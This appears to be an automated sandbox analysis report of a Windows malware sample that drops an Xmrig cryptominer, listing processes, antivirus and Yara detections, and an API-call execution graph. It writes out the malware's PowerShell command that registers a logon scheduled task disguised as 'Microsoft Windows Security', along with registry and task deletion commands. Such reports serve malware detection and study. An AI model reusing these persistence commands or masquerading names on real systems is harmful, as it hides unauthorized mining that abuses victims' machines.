                                                                                                                  Target ID:1
                                                                                                                  Start time:19:54:55
                                                                                                                  Start date:29/11/2024
                                                                                                                  Path:C:\Windows\sysnldcvmr.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Windows\sysnldcvmr.exe
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:80'896 bytes
                                                                                                                  MD5 hash:0C883B1D66AFCE606D9830F48D69D74B
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 82%, ReversingLabs
                                                                                                                  Reputation:low
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:2
                                                                                                                  Start time:19:55:06
                                                                                                                  Start date:29/11/2024
                                                                                                                  Path:C:\Windows\sysnldcvmr.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\sysnldcvmr.exe"
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:80'896 bytes
                                                                                                                  MD5 hash:0C883B1D66AFCE606D9830F48D69D74B
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:3
                                                                                                                  Start time:19:55:07
                                                                                                                  Start date:29/11/2024
                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\1224321169.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\1224321169.exe
                                                                                                                  Imagebase:0x260000
                                                                                                                  File size:8'704 bytes
                                                                                                                  MD5 hash:CB8420E681F68DB1BAD5ED24E7B22114
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 79%, ReversingLabs
                                                                                                                  Reputation:moderate
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:4
                                                                                                                  Start time:19:55:07
                                                                                                                  Start date:29/11/2024
                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                                                                                                  Imagebase:0x7ff724890000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:5
                                                                                                                  Start time:19:55:07
                                                                                                                  Start date:29/11/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:6
                                                                                                                  Start time:19:55:07
                                                                                                                  Start date:29/11/2024
                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
                                                                                                                  Imagebase:0x7ff724890000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:7
                                                                                                                  Start time:19:55:07
                                                                                                                  Start date:29/11/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:8
                                                                                                                  Start time:19:55:07
                                                                                                                  Start date:29/11/2024
                                                                                                                  Path:C:\Windows\System32\reg.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                                                                                                  Imagebase:0x800000
                                                                                                                  File size:77'312 bytes
                                                                                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:9
                                                                                                                  Start time:19:55:07
                                                                                                                  Start date:29/11/2024
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks /delete /f /tn "Windows Upgrade Manager"
                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:11
                                                                                                                  Start time:19:55:15
                                                                                                                  Start date:29/11/2024
                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\2736615137.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\2736615137.exe
                                                                                                                  Imagebase:0xd90000
                                                                                                                  File size:10'240 bytes
                                                                                                                  MD5 hash:96509AB828867D81C1693B614B22F41D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 91%, ReversingLabs
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:14
                                                                                                                  Start time:19:55:23
                                                                                                                  Start date:29/11/2024
                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\204078699.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\204078699.exe
                                                                                                                  Imagebase:0x570000
                                                                                                                  File size:62'976 bytes
                                                                                                                  MD5 hash:77C5EB90118287F666886FC34210C176
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 50%, ReversingLabs
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:15
                                                                                                                  Start time:19:55:28
                                                                                                                  Start date:29/11/2024
                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\1088610392.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\1088610392.exe
                                                                                                                  Imagebase:0x7ff684c80000
                                                                                                                  File size:5'827'584 bytes
                                                                                                                  MD5 hash:13B26B2C7048A92D6A843C1302618FAD
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 76%, ReversingLabs
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:16
                                                                                                                  Start time:19:55:32
                                                                                                                  Start date:29/11/2024
                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\191563587.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\191563587.exe
                                                                                                                  Imagebase:0xaf0000
                                                                                                                  File size:54'784 bytes
                                                                                                                  MD5 hash:B92AD7E3C510355DD54DB74CDF4D522E
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 62%, ReversingLabs
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:17
                                                                                                                  Start time:19:55:33
                                                                                                                  Start date:29/11/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:18
                                                                                                                  Start time:19:55:33
                                                                                                                  Start date:29/11/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:21
                                                                                                                  Start time:19:55:45
                                                                                                                  Start date:29/11/2024
                                                                                                                  Path:C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe"
                                                                                                                  Imagebase:0x7ff7a2dd0000
                                                                                                                  File size:5'827'584 bytes
                                                                                                                  MD5 hash:13B26B2C7048A92D6A843C1302618FAD
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000015.00000002.2592219686.00007FF7A2DEB000.00000004.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000015.00000002.2592219686.00007FF7A2DEB000.00000004.00000001.01000000.0000000F.sdmp, Author: unknown
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 76%, ReversingLabs
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:22
                                                                                                                  Start time:19:55:50
                                                                                                                  Start date:29/11/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:23
                                                                                                                  Start time:19:55:50
                                                                                                                  Start date:29/11/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:24
                                                                                                                  Start time:19:56:09
                                                                                                                  Start date:29/11/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\conhost.exe
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:25
                                                                                                                  Start time:19:56:09
                                                                                                                  Start date:29/11/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:26
                                                                                                                  Start time:19:56:09
                                                                                                                  Start date:29/11/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:28
                                                                                                                  Start time:19:56:27
                                                                                                                  Start date:29/11/2024
                                                                                                                  Path:C:\Windows\System32\dwm.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\dwm.exe
                                                                                                                  Imagebase:0x7ff74e710000
                                                                                                                  File size:94'720 bytes
                                                                                                                  MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000002.4115958696.000002434C9E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000002.4115958696.000002434CA42000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:31
                                                                                                                  Start time:19:56:40
                                                                                                                  Start date:29/11/2024
                                                                                                                  Path:C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe"
                                                                                                                  Imagebase:0x7ff7a2dd0000
                                                                                                                  File size:5'827'584 bytes
                                                                                                                  MD5 hash:13B26B2C7048A92D6A843C1302618FAD
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000002.3318375595.00007FF7A2DEB000.00000004.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001F.00000002.3318375595.00007FF7A2DEB000.00000004.00000001.01000000.0000000F.sdmp, Author: unknown
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:32
                                                                                                                  Start time:19:57:03
                                                                                                                  Start date:29/11/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                                                                  Imagebase:0x7ff7168b0000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:33
                                                                                                                  Start time:19:57:03
                                                                                                                  Start date:29/11/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Disassembly

                                                                                                                  Reset < >

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:0.9%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:17%
                                                                                                                    Total number of Nodes:1447
                                                                                                                    Total number of Limit Nodes:8
                                                                                                                    execution_graph 5821 40cf00 5827 4021b0 5821->5827 5824 40cf25 WaitForSingleObject 5831 401600 5824->5831 5826 40cf3f 5828 4021bb 5827->5828 5829 4021cf 5827->5829 5828->5829 5852 402020 5828->5852 5829->5824 5829->5826 5832 40160d 5831->5832 5851 401737 5831->5851 5833 401619 EnterCriticalSection 5832->5833 5832->5851 5834 4016b5 LeaveCriticalSection SetEvent 5833->5834 5837 401630 5833->5837 5835 4016d0 5834->5835 5836 4016e8 5834->5836 5838 4016d6 PostQueuedCompletionStatus 5835->5838 5839 40d2d0 11 API calls 5836->5839 5837->5834 5840 401641 InterlockedDecrement 5837->5840 5842 40165a InterlockedExchangeAdd 5837->5842 5849 4016a0 InterlockedDecrement 5837->5849 5838->5836 5838->5838 5841 4016f3 5839->5841 5840->5837 5843 40d410 7 API calls 5841->5843 5842->5837 5844 40166d InterlockedIncrement 5842->5844 5845 4016fc CloseHandle CloseHandle WSACloseEvent 5843->5845 5846 401c50 4 API calls 5844->5846 5873 40ab40 shutdown closesocket 5845->5873 5846->5837 5848 401724 DeleteCriticalSection 5850 40a1b0 __aligned_recalloc_base 3 API calls 5848->5850 5849->5837 5850->5851 5851->5826 5853 409d90 7 API calls 5852->5853 5854 40202b 5853->5854 5855 402038 GetSystemInfo InitializeCriticalSection CreateEventA 5854->5855 5861 4021a5 5854->5861 5856 402076 CreateIoCompletionPort 5855->5856 5857 40219f 5855->5857 5856->5857 5858 40208f 5856->5858 5859 401600 36 API calls 5857->5859 5860 40d130 8 API calls 5858->5860 5859->5861 5862 402094 5860->5862 5861->5829 5862->5857 5863 40209f WSASocketA 5862->5863 5863->5857 5864 4020bd setsockopt htons bind 5863->5864 5864->5857 5865 402126 listen 5864->5865 5865->5857 5866 40213a WSACreateEvent 5865->5866 5866->5857 5867 402147 WSAEventSelect 5866->5867 5867->5857 5868 402159 5867->5868 5869 40217f 5868->5869 5870 40d160 17 API calls 5868->5870 5871 40d160 17 API calls 5869->5871 5870->5868 5872 402194 5871->5872 5872->5829 5873->5848 5348 406045 5350 405fbe 5348->5350 5349 40604a LeaveCriticalSection 5350->5349 5351 40a220 8 API calls 5350->5351 5352 40601c 5351->5352 5352->5349 5353 407b49 5354 407b52 5353->5354 5355 407b61 34 API calls 5354->5355 5356 408996 5354->5356 5886 40a28e 5887 40a1b0 __aligned_recalloc_base 3 API calls 5886->5887 5890 40a24d 5887->5890 5888 40a262 5889 409fa0 __aligned_recalloc_base 7 API calls 5889->5890 5890->5888 5890->5889 5891 40a264 memcpy 5890->5891 5891->5890 4351 407590 Sleep CreateMutexA GetLastError 4352 4075c6 ExitProcess 4351->4352 4353 4075ce 6 API calls 4351->4353 4354 407673 4353->4354 4355 40795a Sleep 4353->4355 4407 40e730 GetLocaleInfoA strcmp 4354->4407 4415 40c7d0 4355->4415 4360 407680 ExitProcess 4361 407688 ExpandEnvironmentStringsW wsprintfW CopyFileW 4363 407779 Sleep wsprintfW CopyFileW 4361->4363 4364 4076dc SetFileAttributesW RegOpenKeyExW 4361->4364 4362 407975 9 API calls 4418 405bc0 InitializeCriticalSection CreateFileW 4362->4418 5241 407440 4362->5241 5248 405880 4362->5248 5257 406bc0 Sleep GetModuleFileNameW 4362->5257 4368 4077c1 SetFileAttributesW RegOpenKeyExW 4363->4368 4369 40785e Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 4363->4369 4364->4363 4367 407718 wcslen RegSetValueExW 4364->4367 4365 407ae1 4367->4363 4373 40774d RegCloseKey 4367->4373 4368->4369 4374 4077fd wcslen RegSetValueExW 4368->4374 4369->4355 4372 4078bd SetFileAttributesW RegOpenKeyExW 4369->4372 4372->4355 4376 4078f9 wcslen RegSetValueExW 4372->4376 4409 40e980 memset memset CreateProcessW 4373->4409 4374->4369 4378 407832 RegCloseKey 4374->4378 4376->4355 4381 40792e RegCloseKey 4376->4381 4379 40e980 6 API calls 4378->4379 4383 40784b 4379->4383 4385 40e980 6 API calls 4381->4385 4383->4369 4387 407856 ExitProcess 4383->4387 4384 407a2a CreateEventA 4450 40bf00 4384->4450 4389 407947 4385->4389 4386 407771 ExitProcess 4389->4355 4391 407952 ExitProcess 4389->4391 4398 40d160 17 API calls 4399 407a8a 4398->4399 4400 40d160 17 API calls 4399->4400 4401 407aa6 4400->4401 4402 40d160 17 API calls 4401->4402 4403 407ac2 4402->4403 4495 40d2d0 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 4403->4495 4405 407ad2 4504 40d410 4405->4504 4408 407678 4407->4408 4408->4360 4408->4361 4410 40e9f1 ShellExecuteW 4409->4410 4411 40e9e2 Sleep 4409->4411 4413 40ea26 4410->4413 4414 40ea17 Sleep 4410->4414 4412 407766 4411->4412 4412->4363 4412->4386 4413->4412 4414->4412 4513 40c7a0 4415->4513 4419 405ce5 4418->4419 4420 405bf8 CreateFileMappingW 4418->4420 4432 40d640 CoInitializeEx 4419->4432 4421 405c19 MapViewOfFile 4420->4421 4422 405cdb CloseHandle 4420->4422 4423 405cd1 CloseHandle 4421->4423 4424 405c38 GetFileSize 4421->4424 4422->4419 4423->4422 4426 405c4d 4424->4426 4425 405cc7 UnmapViewOfFile 4425->4423 4426->4425 4428 405c8c 4426->4428 4431 405c5c 4426->4431 4642 40c820 4426->4642 4649 405cf0 4426->4649 4429 40a1b0 __aligned_recalloc_base 3 API calls 4428->4429 4429->4431 4431->4425 4955 40d710 socket 4432->4955 4434 407a25 4445 406fe0 CoInitializeEx SysAllocString 4434->4445 4435 40d660 4435->4434 4438 40d6aa 4435->4438 4444 40d6e8 4435->4444 4965 40d980 4435->4965 4980 40aa80 htons 4438->4980 4443 40e470 24 API calls 4443->4444 4999 40a2d0 4444->4999 4446 407002 4445->4446 4447 407018 CoUninitialize 4445->4447 5144 407030 4446->5144 4447->4384 5153 40bec0 4450->5153 4453 40bec0 3 API calls 4454 40bf1e 4453->4454 4455 40bec0 3 API calls 4454->4455 4456 40bf2e 4455->4456 4457 40bec0 3 API calls 4456->4457 4458 407a42 4457->4458 4459 40d130 4458->4459 4460 409d90 7 API calls 4459->4460 4461 40d13b 4460->4461 4462 407a4c 4461->4462 4463 40d147 InitializeCriticalSection 4461->4463 4464 40b2c0 InitializeCriticalSection 4462->4464 4463->4462 4469 40b2da 4464->4469 4465 40b309 CreateFileW 4467 40b330 CreateFileMappingW 4465->4467 4468 40b3f2 4465->4468 4471 40b351 MapViewOfFile 4467->4471 4472 40b3e8 CloseHandle 4467->4472 5209 40ab60 EnterCriticalSection 4468->5209 4469->4465 5160 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 4469->5160 5161 40aea0 4469->5161 4475 40b36c GetFileSize 4471->4475 4476 40b3de CloseHandle 4471->4476 4472->4468 4474 40b3f7 4477 40d160 17 API calls 4474->4477 4481 40b38b 4475->4481 4476->4472 4478 407a56 4477->4478 4483 40d160 4478->4483 4479 40b3d4 UnmapViewOfFile 4479->4476 4481->4479 4482 40aea0 32 API calls 4481->4482 5208 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 4481->5208 4482->4481 4484 40d177 EnterCriticalSection 4483->4484 4485 407a6f 4483->4485 5236 40d250 4484->5236 4485->4398 4488 40d23b LeaveCriticalSection 4488->4485 4489 409fe0 9 API calls 4490 40d1b9 4489->4490 4490->4488 4491 40d1cb CreateThread 4490->4491 4491->4488 4492 40d1ee 4491->4492 4493 40d212 GetCurrentProcess GetCurrentProcess DuplicateHandle 4492->4493 4494 40d234 4492->4494 4493->4494 4494->4488 4496 40d306 InterlockedExchangeAdd 4495->4496 4497 40d3e9 GetCurrentThread SetThreadPriority 4495->4497 4496->4497 4499 40d320 4496->4499 4497->4405 4498 40d339 EnterCriticalSection 4498->4499 4499->4497 4499->4498 4500 40d3a7 LeaveCriticalSection 4499->4500 4501 40d383 WaitForSingleObject 4499->4501 4502 40d3dc Sleep 4499->4502 4503 40d3be 4499->4503 4500->4499 4500->4503 4501->4499 4502->4499 4503->4497 4505 40d492 4504->4505 4506 40d41c EnterCriticalSection 4504->4506 4505->4365 4507 40d438 4506->4507 4508 40d460 LeaveCriticalSection DeleteCriticalSection 4507->4508 4509 40d44b CloseHandle 4507->4509 4510 40a1b0 __aligned_recalloc_base 3 API calls 4508->4510 